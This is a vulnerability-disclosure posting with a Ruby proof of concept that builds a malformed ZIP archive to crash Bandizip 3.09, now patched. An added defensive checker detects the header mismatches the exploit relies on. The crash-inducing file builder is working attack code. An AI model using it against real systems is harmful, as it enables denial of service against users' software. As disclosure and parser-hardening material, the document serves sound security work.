Bandizip 3.09 Crash Proof Of Concept
Posted on 11 February 2014
#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09 32bit and 64bit (earlier versions might be affected)
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit
# This issue is patched in Bandizip 3.10 after a responsible disclosure
# Open the crafted file in the app and double-click the entry inside it

=begin
Crash state at the time of the report:
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Local file header (30 bytes): signature, version, flags, method, time, date,
# CRC-32, compressed size, uncompressed size, name length, extra length.
# Note that the two "file size" bytes sit at offsets 25-26 of this header, so a
# strict parser reads uncompressed size 0xE4000000 and name length 0x000F (15),
# not the 4068-byte name that actually follows.
lf_header  = "\x50\x4B\x03\x04\x14\x00\x00"
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f"             # file size
lf_header += "\x00\x00\x00"

# Central directory entry (46 bytes); here the 0x0FE4 (4068) name length is
# in the right place and the local header offset is 0.
cdf_header  = "\x50\x4B\x01\x02\x14\x00\x14"
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f"            # file size
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00"
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"

# End of central directory record (22 bytes), one entry on one disk.
eofcdf_header  = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # size of central directory (bytes): 46 + 4068
eofcdf_header += "\x02\x10\x00\x00" # offset of start of central directory, relative to start of archive: 30 + 4068
eofcdf_header += "\x00\x00"

# Our payload: a 4068-byte file name
payload  = "A" * 4064
payload += ".txt"

exploit = lf_header + payload + cdf_header + payload + eofcdf_header

# Binary mode: on Windows a text-mode handle would translate line endings
File.open('bandizip.zip', 'wb') { |f| f.write(exploit) }
#EOF
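The script above hand-assembles the three ZIP structures (local file header, central directory entry, end-of-central-directory record) and relies on the two copies of the entry disagreeing with each other. The following is an added example, not part of the original PoC or of Bandizip: a small Ruby checker that rebuilds the same byte layout inline (a constructed sample, same field values as the script), then walks the archive the way an extractor does, EOCD first, then the central directory, then each local header, and reports every inconsistency a hardened parser should refuse before trusting a name length or a size. `build_archive`, `poc_archive`, `check_archive` and the `MAX_NAME_BYTES` policy limit are assumptions of this example; the field layout follows the PKWARE APPNOTE section 4.3 record formats, all little-endian.

```ruby
# Added example (not the PoC author's code): build and check a ZIP structure.
LOCAL_SIG      = 0x04034b50   # "PK\x03\x04"
CENTRAL_SIG    = 0x02014b50   # "PK\x01\x02"
EOCD_SIG       = 0x06054b50   # "PK\x05\x06"
MAX_NAME_BYTES = 260          # hypothetical policy limit; Windows MAX_PATH is 260

# One stored (method 0) entry. local_name_len and local_usize let the local
# header disagree with the central directory, which is exactly what the PoC does.
def build_archive(name, local_name_len: name.bytesize, local_usize: 0)
  name = name.b
  # sig, ver, flags, method, time, date, crc, csize, usize, name len, extra len
  local = [LOCAL_SIG, 20, 0, 0, 0xACB7, 0x34CE, 0, 0, local_usize,
           local_name_len, 0].pack("VvvvvvVVVvv") + name
  # sig, ver made, ver needed, flags, method, time, date, crc, csize, usize,
  # name len, extra len, comment len, disk, int attr, ext attr, local offset
  central = [CENTRAL_SIG, 20, 20, 0, 0, 0xACB7, 0x34CE, 0, 0, 0, name.bytesize,
             0, 0, 0, 1, 0x24, 0].pack("VvvvvvvVVVvvvvvVV") + name
  # sig, disk, cd disk, entries on disk, total entries, cd size, cd offset, comment len
  eocd = [EOCD_SIG, 0, 0, 1, 1, central.bytesize, local.bytesize, 0].pack("VvvvvVVv")
  local + central + eocd
end

# Byte-for-byte the archive the PoC writes: a 4068-byte name in both records,
# but the local header's size/name-length bytes read as 0xE4000000 and 15.
def poc_archive
  build_archive("A" * 4064 + ".txt", local_name_len: 15, local_usize: 0xE4000000)
end

# Returns { entries: [...], findings: [...] }; an empty findings list means the
# central directory and local headers agree and every length is within policy.
def check_archive(data)
  findings = []
  eocd_off = data.rindex([EOCD_SIG].pack("V"))
  raise "no end-of-central-directory record" unless eocd_off
  _sig, _disk, _cd_disk, _n_disk, n_total, cd_size, cd_off, _clen =
    data[eocd_off, 22].unpack("VvvvvVVv")
  if cd_off + cd_size > eocd_off
    findings << "central directory (#{cd_off}+#{cd_size}) overruns EOCD at #{eocd_off}"
  end

  entries = []
  pos = cd_off
  n_total.times do |i|
    raise "truncated central directory at #{pos}" if pos + 46 > data.bytesize
    sig, _vm, _vn, _flags, comp, _t, _d, _crc, csize, usize, fnlen, exlen, clen,
      _disk, _iattr, _eattr, loff = data[pos, 46].unpack("VvvvvvvVVVvvvvvVV")
    raise "bad central signature at #{pos}" unless sig == CENTRAL_SIG
    name = data[pos + 46, fnlen]
    findings << "entry #{i}: name length #{fnlen} exceeds #{MAX_NAME_BYTES}" if fnlen > MAX_NAME_BYTES

    # Cross-check the local header the central entry points at.
    raise "local header #{loff} out of range" if loff + 30 > data.bytesize
    lsig, _lv, _lflags, lcomp, _lt, _ld, _lcrc, lcsize, lusize, lfnlen, _lexlen =
      data[loff, 30].unpack("VvvvvvVVVvv")
    raise "bad local signature at #{loff}" unless lsig == LOCAL_SIG
    findings << "entry #{i}: local name length #{lfnlen} != central #{fnlen}" if lfnlen != fnlen
    findings << "entry #{i}: local name differs from central name" if data[loff + 30, lfnlen] != name
    if lcomp == 0 && lcsize != lusize
      findings << "entry #{i}: stored entry with compressed #{lcsize} != uncompressed #{lusize}"
    end
    if lcsize != csize || lusize != usize
      findings << "entry #{i}: local sizes disagree with central (#{csize}/#{usize})"
    end

    entries << { name_len: fnlen, local_name_len: lfnlen, comp: comp,
                 usize: usize, local_usize: lusize }
    pos += 46 + fnlen + exlen + clen
  end
  { entries: entries, findings: findings }
end

if __FILE__ == $PROGRAM_NAME
  check_archive(poc_archive)[:findings].each { |f| puts f }
end
```

Run it as-is and it prints the five disagreements in the PoC archive (name length over policy, local versus central name length, local versus central name, stored entry whose compressed and uncompressed sizes differ, and local versus central sizes); `check_archive(build_archive("hello.txt"))` reports none. An extractor that validates the central entry against the local header before allocating or copying the name, as this does, never has to trust either copy alone.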
